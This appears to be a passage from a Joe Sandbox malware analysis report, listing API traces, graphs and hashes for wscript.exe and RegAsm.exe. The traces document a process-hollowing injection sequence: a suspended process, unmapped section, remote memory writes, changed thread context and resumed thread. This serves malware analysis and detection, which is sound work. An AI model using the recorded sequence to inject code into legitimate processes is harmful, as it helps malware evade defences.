                                    • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 062303EC
                                    • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 0623040C
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2086265962.0000000006230000.00000040.00001000.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_6230000_wscript.jbxd
                                    Similarity
                                    • API ID: Process$MemoryThreadWrite$AllocContextVirtualWow64$CreateResumeSectionUnmapView
                                    • String ID:
                                    • API String ID: 4009322845-0
                                    • Opcode ID: abefd893c78f63ec501357fb14bf61d80a739cae84c00b71e3bd370fcc70d613
                                    • Instruction ID: 11fdcece369593e91b84d7ca13311a0e88e49b83da9ba17dc1a1c522e6d9a74f
                                    • Opcode Fuzzy Hash: abefd893c78f63ec501357fb14bf61d80a739cae84c00b71e3bd370fcc70d613
                                    • Instruction Fuzzy Hash: ADA1E1B47A0214BFE5D877F1DC46F2936159FA5B0CF204068EB217F1D1CBA29E228671
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 05660420: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,05660083,0000003C,0000001E,0000004A,0000003E,00000042), ref: 0566043F
                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 05660167
                                    • NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 05660192
                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 056601C9
                                    • WriteProcessMemory.KERNELBASE ref: 05660217
                                    • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 056602FD
                                    • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 05660355
                                    • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 056603A1
                                    • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 056603EC
                                    • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 0566040C
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2085714208.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5660000_wscript.jbxd
                                    Similarity
                                    • API ID: Process$MemoryThreadWrite$AllocContextVirtualWow64$CreateResumeSectionUnmapView
                                    • String ID:
                                    • API String ID: 4009322845-0
                                    • Opcode ID: abefd893c78f63ec501357fb14bf61d80a739cae84c00b71e3bd370fcc70d613
                                    • Instruction ID: e9cae28b5a30c1c018b5fc401d6d8dbeaee8ec28efe782272bf25a0efd3dbe41
                                    • Opcode Fuzzy Hash: abefd893c78f63ec501357fb14bf61d80a739cae84c00b71e3bd370fcc70d613
                                    • Instruction Fuzzy Hash: A5A1B674790204FEE6257BF19C4EF393615DF85B2CF2082BCE2006E1E1C9A36921D66A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 05EC0420: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,05EC0083,0000003C,0000001E,0000004A,0000003E,00000042), ref: 05EC043F
                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 05EC0167
                                    • NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 05EC0192
                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 05EC01C9
                                    • WriteProcessMemory.KERNELBASE ref: 05EC0217
                                    • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 05EC02FD
                                    • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 05EC0355
                                    • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 05EC03A1
                                    • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 05EC03EC
                                    • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 05EC040C
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2086080945.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5ec0000_wscript.jbxd
                                    Similarity
                                    • API ID: Process$MemoryThreadWrite$AllocContextVirtualWow64$CreateResumeSectionUnmapView
                                    • String ID:
                                    • API String ID: 4009322845-0
                                    • Opcode ID: abefd893c78f63ec501357fb14bf61d80a739cae84c00b71e3bd370fcc70d613
                                    • Instruction ID: 5d9c358ca0b2bfeea1b0df9934372ffec6488a4c4450c2485d589a6339ce0a9a
                                    • Opcode Fuzzy Hash: abefd893c78f63ec501357fb14bf61d80a739cae84c00b71e3bd370fcc70d613
                                    • Instruction Fuzzy Hash: 88A1BA74790204FFE51577F1DE4EF2E3A15BF85B08F2091ECF2806E1D1C9A2E9229661
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 05E30420: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,05E30083,0000003C,0000001E,0000004A,0000003E,00000042), ref: 05E3043F
                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 05E30167
                                    • NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 05E30192
                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 05E301C9
                                    • WriteProcessMemory.KERNELBASE ref: 05E30217
                                    • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 05E302FD
                                    • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 05E30355
                                    • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 05E303A1
                                    • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 05E303EC
                                    • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 05E3040C
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2086042644.0000000005E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5e30000_wscript.jbxd
                                    Similarity
                                    • API ID: Process$MemoryThreadWrite$AllocContextVirtualWow64$CreateResumeSectionUnmapView
                                    • String ID:
                                    • API String ID: 4009322845-0
                                    • Opcode ID: abefd893c78f63ec501357fb14bf61d80a739cae84c00b71e3bd370fcc70d613
                                    • Instruction ID: 011d27a7112ed563682538ff5845c6a691bb029f07a209487331f62b9f34deb0
                                    • Opcode Fuzzy Hash: abefd893c78f63ec501357fb14bf61d80a739cae84c00b71e3bd370fcc70d613
                                    • Instruction Fuzzy Hash: 4DA1ED74790204BFE7197BF1DC4FF2936259F85B0CF209168F2816F1E1C9A2AE21D662
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,06230083,0000003C,0000001E,0000004A,0000003E,00000042), ref: 0623043F
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2086265962.0000000006230000.00000040.00001000.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_6230000_wscript.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                    • Instruction ID: a06728400f94ca52a07964d2614275fbf02745d18abaa8cf9fe0ac662e47e194
                                    • Opcode Fuzzy Hash: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                    • Instruction Fuzzy Hash: 72D022F01A43107AF2C17BB14C02F0C3680AF50B09F400814FB24380E0C7BADE1A0276
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,05660083,0000003C,0000001E,0000004A,0000003E,00000042), ref: 0566043F
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2085714208.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5660000_wscript.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                    • Instruction ID: 63ab40e9905fb0ab4bf378d0adc0055a479642ce29fc72c56d4d8641510ddff4
                                    • Opcode Fuzzy Hash: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                    • Instruction Fuzzy Hash: 2ED02274384300FAF2227BB14C0AF283680EF40B19F4009BCF304380E0C5BB9828825E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,05EC0083,0000003C,0000001E,0000004A,0000003E,00000042), ref: 05EC043F
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2086080945.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5ec0000_wscript.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                    • Instruction ID: eaa483d508e10c58486a442ff331fe9f522194381a56efd9f707ebf13d428032
                                    • Opcode Fuzzy Hash: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                    • Instruction Fuzzy Hash: 48D02270384300FAF2017BB14D0AF0E3E80BF40B0AF4018DCF384380E0C5BAD81A0256
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,05E30083,0000003C,0000001E,0000004A,0000003E,00000042), ref: 05E3043F
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2086042644.0000000005E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5e30000_wscript.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                    • Instruction ID: 6837da2436a0fd904e283ee052a2a732f6a597893b416b7e868d8f4490504c31
                                    • Opcode Fuzzy Hash: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                    • Instruction Fuzzy Hash: BBD022703843007AF3017BB14C0FF083690AF40B09F401814F384380E0C5BADA188256
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000003.2049742150.00000000051A8000.00000004.00000020.00020000.00000000.sdmp, Offset: 051A9000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_3_51a8000_wscript.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: WtR
                                    • API String ID: 0-1485073677
                                    • Opcode ID: b4898e1d13a32e43369dcde3abf74b6fb83c62a883448fef4ea7ac13b76d89ee
                                    • Instruction ID: f2c42e56ae3b0c73ba63dfc8f98359cce57ffafa1d5644217f6fc2ae474bfe67
                                    • Opcode Fuzzy Hash: b4898e1d13a32e43369dcde3abf74b6fb83c62a883448fef4ea7ac13b76d89ee
                                    • Instruction Fuzzy Hash: 4BE146A680E7D15FCB1387705C79A917FB06F27204B4E85DBC4C58E8E3E699580AC763
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000003.2049742150.00000000051A8000.00000004.00000020.00020000.00000000.sdmp, Offset: 051A8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_3_51a8000_wscript.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: WtR
                                    • API String ID: 0-1485073677
                                    • Opcode ID: b4898e1d13a32e43369dcde3abf74b6fb83c62a883448fef4ea7ac13b76d89ee
                                    • Instruction ID: f2c42e56ae3b0c73ba63dfc8f98359cce57ffafa1d5644217f6fc2ae474bfe67
                                    • Opcode Fuzzy Hash: b4898e1d13a32e43369dcde3abf74b6fb83c62a883448fef4ea7ac13b76d89ee
                                    • Instruction Fuzzy Hash: 4BE146A680E7D15FCB1387705C79A917FB06F27204B4E85DBC4C58E8E3E699580AC763
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000003.2049742150.00000000051A8000.00000004.00000020.00020000.00000000.sdmp, Offset: 051A9000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_3_51a8000_wscript.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: WtR
                                    • API String ID: 0-1485073677
                                    • Opcode ID: 57605d8b1afbcf101fd26b2cfcaedeb3c8a46dbbfb9524a04dac35a87c6bf216
                                    • Instruction ID: 6a35ac09c01c9c8f164dd4fda017503c6a0cb4293ecdcaf1a93353e739d44866
                                    • Opcode Fuzzy Hash: 57605d8b1afbcf101fd26b2cfcaedeb3c8a46dbbfb9524a04dac35a87c6bf216
                                    • Instruction Fuzzy Hash: D2E155A280E7D15FCB1387705CB9A917FB06F27204B4E85DBC4C58E8E3E698580AC723
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000003.2049742150.00000000051A8000.00000004.00000020.00020000.00000000.sdmp, Offset: 051A8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_3_51a8000_wscript.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: WtR
                                    • API String ID: 0-1485073677
                                    • Opcode ID: 57605d8b1afbcf101fd26b2cfcaedeb3c8a46dbbfb9524a04dac35a87c6bf216
                                    • Instruction ID: 6a35ac09c01c9c8f164dd4fda017503c6a0cb4293ecdcaf1a93353e739d44866
                                    • Opcode Fuzzy Hash: 57605d8b1afbcf101fd26b2cfcaedeb3c8a46dbbfb9524a04dac35a87c6bf216
                                    • Instruction Fuzzy Hash: D2E155A280E7D15FCB1387705CB9A917FB06F27204B4E85DBC4C58E8E3E698580AC723
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Execution Graph

                                    Execution Coverage:17%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:24
                                    Total number of Limit Nodes:1
                                    Execution graph (rendered as an interactive graphic in the original; node and edge lists recovered from its text serialization):
                                    • Nodes (id, address, API where annotated): 13296 2d609e0; 13297 2d60a02; 13298 2d60adc; 13300 2d61ef1; 13301 2d61f18; 13302 2d61f39; 13303 2d61f5b; 13306 2d62390; 13307 2d623c0; 13308 2d62432; 13311 2d623a0; 13312 2d623c0; 13313 2d62432; 13314 2d622d1 VirtualProtect; 13315 2d622d8 VirtualProtect; 13316 2d622d1; 13317 2d62320 VirtualProtect; 13319 2d6235b; 13320 2d622d8; 13321 2d62320 VirtualProtect; 13323 2d6235b; 13324 2d62080; 13325 2d620ca LoadLibraryA; 13327 2d62123
                                    • Edges: 13296->13297; 13297->13300; 13300->13301; 13301->13302; 13301->13306; 13301->13311; 13302->13298; 13303->13298; 13306->13307; 13307->13308; 13307->13316; 13307->13320; 13308->13303; 13311->13312; 13312->13313; 13312->13314; 13312->13315; 13313->13303; 13314->13313; 13315->13313; 13316->13317; 13317->13319; 13319->13308; 13320->13321; 13321->13323; 13323->13308; 13324->13325; 13325->13327

                                    Control-flow Graph

                                    Control-flow graph (interactive graphic in the original; legend: Executed / Not Executed; block and edge lists recovered from its text serialization):
                                    • Basic blocks (id, address range, API where annotated): 566 2d62074-2d62121 LoadLibraryA; 569 2d62123-2d62129; 570 2d6212a-2d62179; 576 2d62183; 577 2d6217b; 578 2d62184
                                    • Edges: 566->569; 566->570; 569->570; 570->576; 570->577; 576->578; 577->576; 578->578
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3309318965.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2d60000_RegAsm.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 62a4aa00fa09098ba0914b3109b6e269dd7f353ead470b7ae46f4f03de909887
                                    • Instruction ID: 0cc3ac411c0483e2ccf15d72dc0da461025366939fce339cd520b83e66a237c8
                                    • Opcode Fuzzy Hash: 62a4aa00fa09098ba0914b3109b6e269dd7f353ead470b7ae46f4f03de909887
                                    • Instruction Fuzzy Hash: 9631E3B0D05248DFDB24CFA9D588BDDBFF1AF48314F248069E409AB354DB79A985CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    Control-flow graph (interactive graphic in the original; legend: Executed / Not Executed; block and edge lists recovered from its text serialization):
                                    • Basic blocks (id, address range, API where annotated): 579 2d62080-2d62121 LoadLibraryA; 582 2d62123-2d62129; 583 2d6212a-2d62179; 589 2d62183; 590 2d6217b; 591 2d62184
                                    • Edges: 579->582; 579->583; 582->583; 583->589; 583->590; 589->591; 590->589; 591->591
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3309318965.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2d60000_RegAsm.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 6055253eed2254ac25ef876a96d13d30f089eb24cdbc2845ecaaefef30d622b0
                                    • Instruction ID: 6b62a920ea80c6d610253683acc051f45a5011d74458c7a6727bab07d0460c38
                                    • Opcode Fuzzy Hash: 6055253eed2254ac25ef876a96d13d30f089eb24cdbc2845ecaaefef30d622b0
                                    • Instruction Fuzzy Hash: 0731F2B0D01248DFDB14CFA9D588BDDBFF5AF48314F248019E409AB354DB79A985CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    Control-flow graph (interactive graphic in the original; legend: Executed / Not Executed; block and edge lists recovered from its text serialization):
                                    • Basic blocks (id, address range, API where annotated): 592 2d622d1-2d62359 VirtualProtect; 595 2d62362-2d62387; 596 2d6235b-2d62361
                                    • Edges: 592->595; 592->596; 596->595
                                    APIs
                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 02D6234C
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3309318965.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2d60000_RegAsm.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 8fa63ecc719a5c01b5eb17b3027a3c95e114ee688b39a6aab53c4fb7a696c15d
                                    • Instruction ID: 458b3004fd0e20766c4a6c43802573882b245e6411d445c5914fefdd51ef4d59
                                    • Opcode Fuzzy Hash: 8fa63ecc719a5c01b5eb17b3027a3c95e114ee688b39a6aab53c4fb7a696c15d
                                    • Instruction Fuzzy Hash: 2A2127B1D002498FCB20DFAAC884AEEFBF4FF88310F14842AD459A7210C7799944CFA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    Control-flow graph (interactive graphic in the original; legend: Executed / Not Executed; block and edge lists recovered from its text serialization):
                                    • Basic blocks (id, address range, API where annotated): 600 2d622d8-2d62359 VirtualProtect; 603 2d62362-2d62387; 604 2d6235b-2d62361
                                    • Edges: 600->603; 600->604; 604->603
                                    APIs
                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 02D6234C
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3309318965.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_2d60000_RegAsm.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: c9b63b392d287814f0160f87676334bffd51b54a7fc3d58a395145af496c8844
                                    • Instruction ID: 865bb88363c9d455f487a184792b06458617e8d1ba9a1fe419e96fdc3d8741fe
                                    • Opcode Fuzzy Hash: c9b63b392d287814f0160f87676334bffd51b54a7fc3d58a395145af496c8844
                                    • Instruction Fuzzy Hash: 9F11F4B5D002499FDB10DFAAC944AAEFBF4FF48324F14842AD459A7210CB79A944CFA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3308389284.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_12cd000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a48bee4ff8964ad6fe8e1ad681d13b5b0ea69217bb23d6fbd823813f1b40816d
                                    • Instruction ID: 9bc66b1e54a44a03f6bbeeb7086a4ff280842cf1a9342762ec2ffc3d43ffaa43
                                    • Opcode Fuzzy Hash: a48bee4ff8964ad6fe8e1ad681d13b5b0ea69217bb23d6fbd823813f1b40816d
                                    • Instruction Fuzzy Hash: 51210071510248DFCB159F98D9C0B66BF65FB84724F20C67DEB090B256C33AE446CAE2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3308389284.00000000012CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012CD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_12cd000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 07d586b370810bf15e8d939e07fb0dccd80900219e7a08ccebccaf9c83e80135
                                    • Instruction ID: f8769aa07c1e8c209f9b86bdb22e410768d8be6917a1ca153b933c26298212d6
                                    • Opcode Fuzzy Hash: 07d586b370810bf15e8d939e07fb0dccd80900219e7a08ccebccaf9c83e80135
                                    • Instruction Fuzzy Hash: CF11CA76404284CFCB12CF54D9C4B56BF71FB84724F28C6A9DA494B616C33AE45ACBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2078219995.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1330000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (aq$Te]q
                                    • API String ID: 0-2961548996
                                    • Opcode ID: 1085d0870cfaa3aa8b11908f396323611c35bf7ef338676ce5e3df1646368ad5
                                    • Instruction ID: 698bf07975c7d7a58e97a34df1f103b26f2e4f17d53f42b7c459f07d09a90336
                                    • Opcode Fuzzy Hash: 1085d0870cfaa3aa8b11908f396323611c35bf7ef338676ce5e3df1646368ad5
                                    • Instruction Fuzzy Hash: 9A517B70B101148FC748DF6DC458AAEBBF6BF89710F2581A9E806EB3A5CB75DC018B95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2078219995.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1330000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Haq$dLcq
                                    • API String ID: 0-1713614415
                                    • Opcode ID: 565081983dae670f30b7c1815961fc7bc62eac522c98b9a00b57073b7257581a
                                    • Instruction ID: 128c6ef5fe85829e4e0a089848ae40b79422e2bd07084aae8cbe91b47b6aa8dc
                                    • Opcode Fuzzy Hash: 565081983dae670f30b7c1815961fc7bc62eac522c98b9a00b57073b7257581a
                                    • Instruction Fuzzy Hash: 2941AD317002058FDB19DF69D498AAEBBF6FF89314F1444AAE105EB3A1CB749C05CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2078219995.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1330000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LR]q
                                    • API String ID: 0-3081347316
                                    • Opcode ID: 0ac49a8a5ed48eb40c4effa7a1a698c33443d4c79e0a92e79f1cbc9b53362033
                                    • Instruction ID: 883dab8567d96622a085b99c8ee2e38497ade1852e3c909b7a884a6300b923f1
                                    • Opcode Fuzzy Hash: 0ac49a8a5ed48eb40c4effa7a1a698c33443d4c79e0a92e79f1cbc9b53362033
                                    • Instruction Fuzzy Hash: 8D51CAB0B002099FCB08EFB9C55066EBBFAEFC8314F248569D44ADB355DA35DC428B95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2078219995.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1330000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: dLcq
                                    • API String ID: 0-2236789282
                                    • Opcode ID: c9f1312e3e8d860808148f9791edf6abdc4d0238eac58ee404592bef12073b0b
                                    • Instruction ID: 732bd8deff506c7ae13d4f240a765de61d62d1b973aa458f5f38affe0762b145
                                    • Opcode Fuzzy Hash: c9f1312e3e8d860808148f9791edf6abdc4d0238eac58ee404592bef12073b0b
                                    • Instruction Fuzzy Hash: 48319C71A002058FDB18DF68C598BAEBBF6FF88304F148569E405AB3A1CB74DC05CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2078219995.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1330000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: lqbq
                                    • API String ID: 0-1968102735
                                    • Opcode ID: 6804fdc6f12861a8d6eedb4e0b368aea8060c9ef556022363eed8f8285704c60
                                    • Instruction ID: 7148ae5091cc33603402e6dff2d673da712c8f3bc06064c65f0db627b87b25a8
                                    • Opcode Fuzzy Hash: 6804fdc6f12861a8d6eedb4e0b368aea8060c9ef556022363eed8f8285704c60
